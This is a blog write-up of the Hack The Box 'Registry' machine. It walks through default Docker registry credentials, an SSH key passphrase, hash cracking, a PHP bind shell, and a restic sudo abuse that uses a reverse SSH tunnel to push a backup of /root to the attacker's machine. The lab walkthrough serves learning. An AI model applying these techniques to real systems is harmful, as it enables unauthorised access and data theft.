Hack The Box - Registry Writeup

System Summary



Initial Enumeration

Let's fire nmap:


The second line gives an hint related to docker...
But before going down this road, let's use dirbuster and find a link related to webapp Bolt:



Let's now open the main page with IP address:

Retry using hostname docker.registry.htb:

Mmmmh, another site...
Let's try with http://docker.registry.htb/v2


We receive a login page for docker and using admin:admin we can get in:


Initial Foothold & user flag

Ok. it's seems we can get something, but here we need to some guess... is there any interesting docker image?

Let's look with docker commands:
We can login with admin:admin

We can guess the name of the docker image (I rooted the box four months ago and didn't get enough notes: there might be some hint somewhere, but I don't remember)

The name of the image is bolt-image

 We can get it with docker pull

 List the image with the ID

And run it:

And we're into a local copy of the docker image

The folder .ssh contains a couple of SSH keys (pub+priv)

 But the private part of the key is encrypted
Let's look at other files and we can see a /etc/profile.d/01-ssh.sh that has a password for SSH key


The passphrase for id_rsa is: GkOcz221Ftb3ugog

we now can get the SSH key and its passphrase and use it to connect to the real box 10.10.10.159


We can also get the user flag: ytc0ytdmnzywnzgxngi0zte0otm3ywzi

Root Flag

There are two virtual hosts:




If we look in /var/www/html/bolt we find a sqlite database that is related to Bolt webapp


We can open the file, dump the tables name and get user information from the bolt_users table:


We can bruteforce the hash of the admin user with hashcat and rockyou wordlist

Which in a few seconds gives a password: strawberry

 And we can get into Bolt weapp.
We're admin and there is a section where we can upload files (it needs some additional configuration )


Let's upload a php that executes commands.
First try with a ping back to our machine:




 Once we got it working (easy) we can go for a much more interesting PHP bind shell:
Why bind shell? Because outbound connection are closed! (keep in mind for root escalation)

 So we're in as www-data:

The next step is to look for sudo permissions and we see that www-data can run a restic command with no password


Restic is a backup software 
The next steps require a bit of restic study

We have to prepare a restic repo somewhere (/tmp/rest) using an access password of “pippo”

$ export RESTIC_PASSWORD=pippo
$ restic init --repo /tmp/rest

Then we have to save the password in a file and use sudo to run restic and create a backup of /root

$ echo  pippo > /tmp/.pass

$ cd /tmp
$ sudo /usr/bin/restic backup -r rest/ --password-file /tmp/.pass /root
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00

duration: 0:00
snapshot 7579ed40 saved

Unfortunately this creates a snapshot on /tmp/repo but the backup data is only accessible by root user in bolt machine. Therefore it's not usable.

We have an alternative: prepare a restic repository on our machine and push the backup to it: but how?
Outbound connection from server are not permitted after all...

We can use a reverse ssh tunnel so we can map the port 8000 on registry box to our machine port 8000
ssh -i id_rsa -R 8000:localhost:8000  bolt@10.10.10.159
so 127.0.0.1:8000 on registry will correspond to our machine 8000 port.

Then we have to download and setup a simple rest-server: https://github.com/restic/rest-server and run it on port 8000.

Then prepare the “remote” repo using the tunnel 
$ restic init -r rest:http://127.0.0.1:8000/
created restic repository 23acaadb0f at rest:http://127.0.0.1:8000/
Please note that knowledge of your password is required to accessthe repository. Losing your password means that your data is
irrecoverably lost.

Next create backup using the tunnel
$ sudo /usr/bin/restic backup  -r rest:http://127.0.0.1:8000/ --password-file /tmp/.pass /root
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00

duration: 0:00
snapshot 32707dcd saved


And now we have the snapshot in our computer.

We can be root on our machine so we can user restic to show the snapshot
 And we can restore it  in /tmp/restore

Now we have a backup copy of /root
And we can get the root flag

 Additionally we can also get the id_rsa and get a shell





By -

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)